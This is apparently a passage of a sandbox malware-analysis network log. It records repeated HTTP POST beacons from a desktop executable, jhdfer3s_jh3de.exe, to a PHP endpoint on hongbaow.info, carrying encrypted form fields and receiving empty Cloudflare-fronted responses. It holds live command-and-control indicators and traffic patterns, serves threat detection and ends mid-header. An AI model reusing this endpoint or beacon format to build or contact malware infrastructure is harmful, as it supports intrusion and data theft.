                                      2025-01-22 07:44:13 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:44:13 UTC808INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQHeVhIGGXTXv3tyACo6m3pi2WNS7VD850%2F4sp8XzHHjoHhtunapfXElt1R7d%2Ba6dNGevrYzXfLz2yXhhmoSzZZZqSMfO8IKzRAONskn92B6MtrrIbX%2B2ysQjtqrOEJV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deae45aa242eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1532&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1844598&cwnd=215&unsent_bytes=0&cid=04eb4855f39cfa87&ts=328&x=0"
                                      2025-01-22 07:44:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      65192.168.2.456217104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:14 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:14 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:14 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:14 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcN2CSCztM2vw4cUKz45UCN%2Bhv30aQCyPi4ZQDbkhPIAgXWb9PKZyt5wuX78iCuG5%2FsFM7dAA9MUS%2FhD3NlrcxiY84gnxNYutihEfVYBqdgDrEhUyXlms7nGAc%2BMLNvG"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deae89c4342eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1538&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1842271&cwnd=215&unsent_bytes=0&cid=fe8454806c3c092a&ts=317&x=0"
                                      2025-01-22 07:44:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      66192.168.2.456218104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:17 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:17 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:18 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:18 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SygqrbiX6aCn3gOfrdWNy0oUFgOTZgP0hBVH4dVylyqn0Ye%2FqM7vok2DJbHUxukK7iofzVOr0%2BWpV3NKHUXt3pSjFiESvOgNKt49UfVeQH2vpkZ3k0oj7yJdvvgbARAG"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deb00aafd8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1774&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1620421&cwnd=162&unsent_bytes=0&cid=88d49f40a4b1bf6f&ts=345&x=0"
                                      2025-01-22 07:44:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      67192.168.2.456219104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:19 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:19 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:44:19 UTC816INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8JDQHBFiJvAYaM7t%2Bx%2FOYNawo9rdkmwu5BDJCQNb3Xe4IWnyh2x9ZO721OuC8WfE%2FWwkT66kXHy5tWsjJpbXdTJHrxw%2BH6gbBM93z04WHGVxl%2FqCbue58Up2%2FhUvmTI"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deb087d948ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1756&rtt_var=677&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1593016&cwnd=162&unsent_bytes=0&cid=a74bf8117258946a&ts=329&x=0"
                                      2025-01-22 07:44:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      68192.168.2.456220104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:21 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:21 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:22 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:22 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VOnjF91udmYVJB%2BcvyEArTvVbib8vkYuiHr8YtnoWMtlkfmlqSm31pnAzYh1HZ7pFfgk0KMZlArG3RqvHBV1gezTLbv%2Bvwu8be6lqhNsgGRaQMhu4SCAJVHuN%2Bb2njH"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deb187aa38ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1618625&cwnd=162&unsent_bytes=0&cid=f285626589c23bc1&ts=325&x=0"
                                      2025-01-22 07:44:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      69192.168.2.456221104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:24 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:24 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:44:25 UTC812INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUiV%2B1OYJrYwdhMRHT4NJioITVsv3g%2FbHJNN5nbTmmWXTTrHF%2FhZPNOuto3F5wTD%2BMDoWoFUp3I6s5q4YwdZ2uOqObD%2B3ztdZGG2FgWxPPKk3qUECfBGDxUrZoDlc14y"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deb2ccc1d43be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1565&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1809169&cwnd=231&unsent_bytes=0&cid=b0851ed185b8a673&ts=343&x=0"
                                      2025-01-22 07:44:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      70192.168.2.456222104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:25 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:25 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:25 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Y48%2F1iRynZss4hR3VLBf4cP7KIRn5Sl5B%2FergqzjBS8qB33k4Lxx5DpR7CJV8lDGJ8VsRCttolRTmx9S%2BSHIHzkCLXO2dwlEz8uTFi5T58Ny%2BkwZzt7Y7WxngjdW8o8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deb301e8bc470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1954484&cwnd=219&unsent_bytes=0&cid=f681c34bbe21ecfd&ts=342&x=0"
                                      2025-01-22 07:44:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      71192.168.2.456223104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:29 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:29 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:29 UTC815INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z6W%2BlrOD8GT4vZ8rb%2B2SL4BEg6a4Y1u79TBieqYp%2FGWTJGQHtHP4frme